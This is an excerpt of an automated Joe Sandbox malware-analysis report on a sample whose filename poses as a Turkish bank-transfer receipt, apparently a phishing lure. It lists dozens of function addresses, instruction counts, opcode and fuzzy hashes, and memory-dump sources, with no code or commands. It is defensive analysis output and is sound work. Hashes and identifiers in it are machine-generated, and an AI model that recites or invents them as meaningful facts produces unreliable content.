Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7bd89d63141b12e382332ebcf83aec9334738c02dfe188f8479b709441767ff
Instruction ID: f24f5f19e0851fe37e7e7680c87a0b5f1bae022353aa87dc8e777ba5def3b6b1
Opcode Fuzzy Hash: a7bd89d63141b12e382332ebcf83aec9334738c02dfe188f8479b709441767ff
Instruction Fuzzy Hash: 61D1CE78E01218CFEB14DFA5D994B9DBBB2BF89300F1081A9D809AB355DB759E81CF14

Function 00FDC146 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b30586856e1116eca9d837935c9b4212d66fe7d42fe06b7a6df2e5463e471f
Instruction ID: d507c535d393b700195b44b8899a43e0e6dbda2a1485f10cf6e7f25eee0d1e19
Opcode Fuzzy Hash: b0b30586856e1116eca9d837935c9b4212d66fe7d42fe06b7a6df2e5463e471f
Instruction Fuzzy Hash: 60A1C575E00218DFDB14DFA9D884A9DBBF2BF89310F14806AE809EB365DB319941DF91

Function 00FD5362 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648b9e6778ed0d1e38a97c4b037a4e2ca960b9238d68d27ab503449012d16b90
Instruction ID: e60cade41ca0b0b1534148b69c94383e93fdab29b93cb226f0a125b31b4da7e6
Opcode Fuzzy Hash: 648b9e6778ed0d1e38a97c4b037a4e2ca960b9238d68d27ab503449012d16b90
Instruction Fuzzy Hash: 8191E275E00618CFDB14DFA9D984B9DBBF2BF89311F18806AE809AB361DB309945DF50

Function 00FDCCD8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3431229ab660c3df8a0df85b232e9cd400c554b6ccb760c37aa19b4678ced376
Instruction ID: 7b83adf2c834e2f3566aa011b5135885e650b1a375210a4387b0c37e1af68acd
Opcode Fuzzy Hash: 3431229ab660c3df8a0df85b232e9cd400c554b6ccb760c37aa19b4678ced376
Instruction Fuzzy Hash: 6D819274E00218DFDB14DFAAD984B9DBBF2BF89310F14806AE819AB365DB349941DF50

Function 00FDC468 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dafba651c9b41502a4e6702139cb4ca7a599c4056c37d7df413ad277e39d57ab
Instruction ID: 982521a4c06744a1d8d07e9ad09b662b9f220b278ecfc902621b9eb59871efa4
Opcode Fuzzy Hash: dafba651c9b41502a4e6702139cb4ca7a599c4056c37d7df413ad277e39d57ab
Instruction Fuzzy Hash: 3F81A474E00218CFEB14DFAAD944B9DBBF2BF88310F14806AE419AB365DB349941DF50

Function 00FDD278 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c86a910882afaf3be5e5fe79da8de41d0bfebb1cbe6c971fa73473f4e5ab5e
Instruction ID: 57ed56e8378e50affbedaae5ff597b0ab2f650fd24eb799c01252e6bc1e8dd84
Opcode Fuzzy Hash: 83c86a910882afaf3be5e5fe79da8de41d0bfebb1cbe6c971fa73473f4e5ab5e
Instruction Fuzzy Hash: 8381C474E00218CFDB14DFAAD984B9DBBF2BF89310F14806AE809AB365DB349941DF50

Function 00FDC738 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc497d1f90a3503a2a3d947ba0e50d267010f7bb1cd886f3cc91835ec6c0e84
Instruction ID: b251ffc8e0e8aaea289fc46466fd992675809bc497129a34cdf489ba758979c0
Opcode Fuzzy Hash: 2dc497d1f90a3503a2a3d947ba0e50d267010f7bb1cd886f3cc91835ec6c0e84
Instruction Fuzzy Hash: AE819174E00218CFDB14DFAAD994B9DBBF2BF88310F14806AE419AB365DB309941DF51

Function 00FDCA08 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4313fa25903f565dde09382174830d5d6be6396ad39e35228c305b00f96e31
Instruction ID: bd259a791136223721ba7ef2408136c779cbcd349768976eb9e53bbe12bee198
Opcode Fuzzy Hash: 1f4313fa25903f565dde09382174830d5d6be6396ad39e35228c305b00f96e31
Instruction Fuzzy Hash: EF818074E00258CFDB14DFAAD984B9DBBF2BF88310F14806AE819AB365DB749941DF50

Function 00FDCFAA Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5254ca7d97c7545ac0c9996ecd15b6259cd4157b10e2c2ef515aeb856318f59d
Instruction ID: 576c35e8cc1584c8fddeff83abfd247f9888c970f3cb4cae3f0eff575e10ff87
Opcode Fuzzy Hash: 5254ca7d97c7545ac0c9996ecd15b6259cd4157b10e2c2ef515aeb856318f59d
Instruction Fuzzy Hash: A0819274E00218CFEB14DFAAD984B9DBBF2BF88310F14816AE419AB365DB349945DF50

Function 056B81D0 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecd87191e9216bb4a43cef41a2829b3edf9ea676e976fb9eee40f9f07e9012c7
Instruction ID: 3f2b338674f088a654d925ceb08c4065808d0ad470d7d363914a1a9db0dd4496
Opcode Fuzzy Hash: ecd87191e9216bb4a43cef41a2829b3edf9ea676e976fb9eee40f9f07e9012c7
Instruction Fuzzy Hash: 8181C274E00218CFEB58DFAAC954BDDBBB2BF89300F208169D419AB354DB745985CF54

Function 00FDE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6416116fb7e428b04a884a3c2a9d0ce06070b9e4bd4692c7bde51cfc0747bc
Instruction ID: 288f15a9df13b0f44b04a52d0a0c10bb7a4e14877197f9611b6e503c334b45b0
Opcode Fuzzy Hash: 1d6416116fb7e428b04a884a3c2a9d0ce06070b9e4bd4692c7bde51cfc0747bc
Instruction Fuzzy Hash: 0C518575E00208DFEB18DFA6D894A9DBBB2BF89310F24C12AE815AB365DB345841DF54

Function 00FDE97A Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567110131c86c888085ce6f0c108cb789b1278a6dc93a0edf0385d1de326194f
Instruction ID: 55f91c637cd40aeb70f936ada1419a0c90b33468e7f56d12b4ace4994305b847
Opcode Fuzzy Hash: 567110131c86c888085ce6f0c108cb789b1278a6dc93a0edf0385d1de326194f
Instruction Fuzzy Hash: 3251A774E00208DFDB18DFAAD894A9DBBB2FF89310F24C12AE815AB365DB345841DF54

Function 056B7B69 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec8d7e658a60bf925ce355101a13b1968ac183005bdf469198b36892f3d17d3
Instruction ID: e9a4c0ee9aa72d39e28172b93da0a12c683bf46bc54a8fe17c4203fd399da3f7
Opcode Fuzzy Hash: 3ec8d7e658a60bf925ce355101a13b1968ac183005bdf469198b36892f3d17d3
Instruction Fuzzy Hash: 9E41C2B0D002088BEB18DFAAC8547DEBBF6BF89300F14C16AD418BB254DB755946CF64

Function 056B8FA1 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68f93324a22f737b306a0ba3723307792a67f732af0948ca327ab55fe6a9a2f
Instruction ID: fb233fe2dee2ea2eb4f4653d3dc257d7ee92ae760b3b8f2d42cb257461bf400c
Opcode Fuzzy Hash: b68f93324a22f737b306a0ba3723307792a67f732af0948ca327ab55fe6a9a2f
Instruction Fuzzy Hash: 4641E570E006088BEB08DFAAD854ADEFBB2BF89300F24C129D414BB254DB745946CF54

Function 00FDE007 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ae67b4cc6d678fb0336f24e02da43e7cd9706fe7ade8cdc6b84c30388b5ea0
Instruction ID: 18440593092968f75b56f8c185a453c4220e9a1722fbb640103e34296336f427
Opcode Fuzzy Hash: 23ae67b4cc6d678fb0336f24e02da43e7cd9706fe7ade8cdc6b84c30388b5ea0
Instruction Fuzzy Hash: CB129ABC0216479FA6607F38E7EC12ABB60FB4F363704AC54B58EC04599B7E14598B61

Function 00FDE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09047dc273497505aeaae2dbea4048564fb66d8078f786a3d57b2791f3eecbb7
Instruction ID: 97a6400dbc5dc47b7aa7b34b7c8626c12fffc2b854ffbc7368e7189e00793722
Opcode Fuzzy Hash: 09047dc273497505aeaae2dbea4048564fb66d8078f786a3d57b2791f3eecbb7
Instruction Fuzzy Hash: 581299BC0216479FA6607F38E7EC12ABB60FB4F363704AC54B58FC04599B7E14598B61

Function 00FD0C8F Relevance: .5, Instructions: 543COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69e2a15d77a728bbd0cf7eabd5539965b22a0e927f3c7bcaa18a27066c77bf5e
Instruction ID: bc751d7b007673676bd2ed92920f60d061ce3f26363dbaab6e74554c8b288519
Opcode Fuzzy Hash: 69e2a15d77a728bbd0cf7eabd5539965b22a0e927f3c7bcaa18a27066c77bf5e
Instruction Fuzzy Hash: 045228B9901219CFCB54EF64ED84B8DBBB2FB48301F1086A9D409A7359DB306E95CF91

Function 00FD0CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ed8fa9e5b429be4f9cd7e27a9acd7a698e8a69f04d7c466551074bcef4350
Instruction ID: 0c8312ac32b08ee19012b4f324801f1019cfe3f85bf2c736369b4b7f94fbd717
Opcode Fuzzy Hash: bf6ed8fa9e5b429be4f9cd7e27a9acd7a698e8a69f04d7c466551074bcef4350
Instruction Fuzzy Hash: 39521779A01219CFCB54EF64ED84B8DBBB2FB48301F1086A9D409A7359DB306E95CF91

Function 00FD76F1 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd3e5637d3542288238b95faa31b48ce26121b7e157c716750c5e88a8261f64
Instruction ID: c231de44455bcfeb5e4dff537015064cfd1f1825bd4904499ba3086effdd7af1
Opcode Fuzzy Hash: 1fd3e5637d3542288238b95faa31b48ce26121b7e157c716750c5e88a8261f64
Instruction Fuzzy Hash: 2E124831A043089FCB15EF69D984A9EBBF2FF88324F18859AE4459B361E731ED41DB50

Function 00FD5F38 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e4da9cabf7e6c5f682d753efc3890feae4e298396f285b4b052761bff6ed6dc
Instruction ID: 814e94d98b1b4db294fc9b93146d7f3ce95902dcdfe46cf99cb09f586c62f085
Opcode Fuzzy Hash: 4e4da9cabf7e6c5f682d753efc3890feae4e298396f285b4b052761bff6ed6dc
Instruction Fuzzy Hash: AE919D75704210CFDB159F64C898B6E7BA3FB88311F18846AE446CB396DB79CC41DBA1

Function 056B9841 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0acea4e20f399b7360ea957130f9ab1c22a2b70788d2089fe453913339cd4269
Instruction ID: 2af7e9ef75a8783d1204c0a9ccc1b8b6320626b7de05a3475e09dc95a77e3207
Opcode Fuzzy Hash: 0acea4e20f399b7360ea957130f9ab1c22a2b70788d2089fe453913339cd4269
Instruction Fuzzy Hash: 1BC19F74A002299FEB64DF68C955BD9BBB2BB48300F1081E9D90DA7390DB709EC5CF61

Function 056B9850 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56714df658d0aeee7730820d4519b45e7106fbf985f5032e50ba955e60c5f773
Instruction ID: 88d8ad16180e4ebef8648fbbf3bf6fea3470fbe93781f4804a2e3ddf5ea6f337
Opcode Fuzzy Hash: 56714df658d0aeee7730820d4519b45e7106fbf985f5032e50ba955e60c5f773
Instruction Fuzzy Hash: F8B19E74A002299FEB64DF69C955BD9BBB2BB88300F1081E9D90DA7390DB705EC5CF61

Function 00FD6498 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2333d27124d354130960cb354e1ac63b4e421f32735a1dbf3342001faf7a94c4
Instruction ID: 9fdb2dc99e12abb50dceb12a450a8c4bbdcf540a2281a5d1bb37dff7d2c0b2e0
Opcode Fuzzy Hash: 2333d27124d354130960cb354e1ac63b4e421f32735a1dbf3342001faf7a94c4
Instruction Fuzzy Hash: 63818E71A00505CFCB14CFA9D484AADBBB3BF89314B29816AD405EB365DB35EC41EF60

Function 00FDAEF0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd6ac1442a7b051158677643b547c95e1ef2171aca7fb9ea7751b4c80891cbd
Instruction ID: 62ad0d1bb14ff728b114f42f88140f8e303f539ac76bca1c90c93a0be168fd95
Opcode Fuzzy Hash: cbd6ac1442a7b051158677643b547c95e1ef2171aca7fb9ea7751b4c80891cbd
Instruction Fuzzy Hash: 0B71A475B00204DFCB149F68C89469EBBB7FF89320F19816AE515DB391DB359C02CBA5

Function 056B8A68 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60ef9c6d2aea713ba2dcfb250dc1236c7a67cb45a4b0a8f023d22bf9e01b8aa
Instruction ID: 109bb079016cd6d2d68fcdb750ee14e9a53d9bf273e3e9d0f75722cbc7223112
Opcode Fuzzy Hash: c60ef9c6d2aea713ba2dcfb250dc1236c7a67cb45a4b0a8f023d22bf9e01b8aa
Instruction Fuzzy Hash: FF718131F042189BDB15DFB9C8506EEBBB6AF89700F148529E406AB381DF749D82C7A5

Function 00FD80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c3066289055d6a246674b97397947309b3f0ebb18d81adc9e5852013660d80
Instruction ID: fa2b0c1e22213c1ad556e61e1d969b5bb976f0c59990c5ad2b4b68cf8232d2b8
Opcode Fuzzy Hash: a6c3066289055d6a246674b97397947309b3f0ebb18d81adc9e5852013660d80
Instruction Fuzzy Hash: D8715D34B006058FCB25DF69C884A6E7BE6AF59391F1940AAE806CB371DF75DC42EB50

Function 056B94F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72421aa38242aa5c82f4d0444847056a1e6412cee4a7efd7b525922735aab6b
Instruction ID: d09201aff9b5c577bec14cf2696e27ff85e2987a8aca30428b75d60f734caa4f
Opcode Fuzzy Hash: a72421aa38242aa5c82f4d0444847056a1e6412cee4a7efd7b525922735aab6b
Instruction Fuzzy Hash: 2C61D475E402089FEB18DFA9E954BDDBBF2BF88310F108069E908BB354DA709941CB64

Function 00FDF739 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e520420a370db65193da6ff76605458665f596e61ddad44cbc254761a6706d8
Instruction ID: 11615212b050bd28c3ce985b255e1e40d009906184c6d4718daabf640a48012a
Opcode Fuzzy Hash: 3e520420a370db65193da6ff76605458665f596e61ddad44cbc254761a6706d8
Instruction Fuzzy Hash: D261EB74D01318DFDB14DFA5D894BAEBBB2FB88300F20812AE806AB294DB795945DF50

Function 00FD9C30 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38cb0230c89b989361989520292caace55996b31a798e0f54b775339962e792b
Instruction ID: 5f1b1a662fb3aa6a705dc1cbc36ac65ff02aa3adbc2afe741bee3743841df9eb
Opcode Fuzzy Hash: 38cb0230c89b989361989520292caace55996b31a798e0f54b775339962e792b
Instruction Fuzzy Hash: 4851B2357042059FDB10DFA9C844BAABBE7EF88320F18846AE948CB355DBB5DC01DB61

Function 056B9CD7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f20489886c021618a5567b58ad2b8f8214584686731086af662f0383658751c
Instruction ID: beeaec1dcbdff74c2f2185dafaf49501e6c5d6d63f287bbb637d97567627b01c
Opcode Fuzzy Hash: 8f20489886c021618a5567b58ad2b8f8214584686731086af662f0383658751c
Instruction Fuzzy Hash: 38518074E002199FDB04DFA9D595AEEBBF1BF88300F20802AD505AB394D7745A85CFA4

Function 00FDD548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f33d5942078ed1c8e383e1ef9b65443d50392eaca0d05b9312d314e049113c
Instruction ID: 3146b64897b63cc20519208f8a2db60954af5cb0db47305fb992c5e0f35f981e
Opcode Fuzzy Hash: 80f33d5942078ed1c8e383e1ef9b65443d50392eaca0d05b9312d314e049113c
Instruction Fuzzy Hash: 65519374E01208DFDB44DFA9D984A9DBBF2BF89300F248169E809AB365DB31A905CF50

Function 00FDFDD4 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9eb670b005e97941679e5d18e5d455db555b4698963f78043b9d05b26a0566b
Instruction ID: 0660a6ec639cb5efac0f45683dfdd00627e7da658f651d02e5cb8365d6b8f8e9
Opcode Fuzzy Hash: a9eb670b005e97941679e5d18e5d455db555b4698963f78043b9d05b26a0566b
Instruction Fuzzy Hash: 97512570D002589FDB14CFA9C894B9DBBF2BF48310F18852AE856AB3A5D7749848CF91

Function 00FD41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be408a6c6b208e2c748f65f808bb0a4d670b93c1372de77e84195e03cef5b5a0
Instruction ID: 07415febf34460c94991b400967235a1c6b014fda6ee08e9bf197b0abe4549cb
Opcode Fuzzy Hash: be408a6c6b208e2c748f65f808bb0a4d670b93c1372de77e84195e03cef5b5a0
Instruction Fuzzy Hash: 9D519175E01308CFDB48DFA9D98499DBBF2FF89311B248469E805AB364DB35A842DF50

Function 00FDFDE0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402780ef300c54c5b71ac51b4714fb07de476966ef22ff66a45025d72708b7fe
Instruction ID: 209069e39c5ac6d9b40d0e31a310512983b1e6f327f8309813cba95d5729fc32
Opcode Fuzzy Hash: 402780ef300c54c5b71ac51b4714fb07de476966ef22ff66a45025d72708b7fe
Instruction Fuzzy Hash: 77513670D003589FDB18CFA9C894B9DBBF2BF48310F18812AE816AB3A5D7749844CF91

Function 00FDA303 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d2de6016be95688cd0e46a18c509950482725a7593e0729d8653effbc3cd419
Instruction ID: 881e6bc832c7919c39b03d7d853e8ca4b974b25f795051fa6d31305305c80440
Opcode Fuzzy Hash: 3d2de6016be95688cd0e46a18c509950482725a7593e0729d8653effbc3cd419
Instruction Fuzzy Hash: 6B41A231A04249DFDF11CFA4C844A9DBBB3FF4A320F188056E845AB3A1D376E954EB56

Function 056B8A59 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

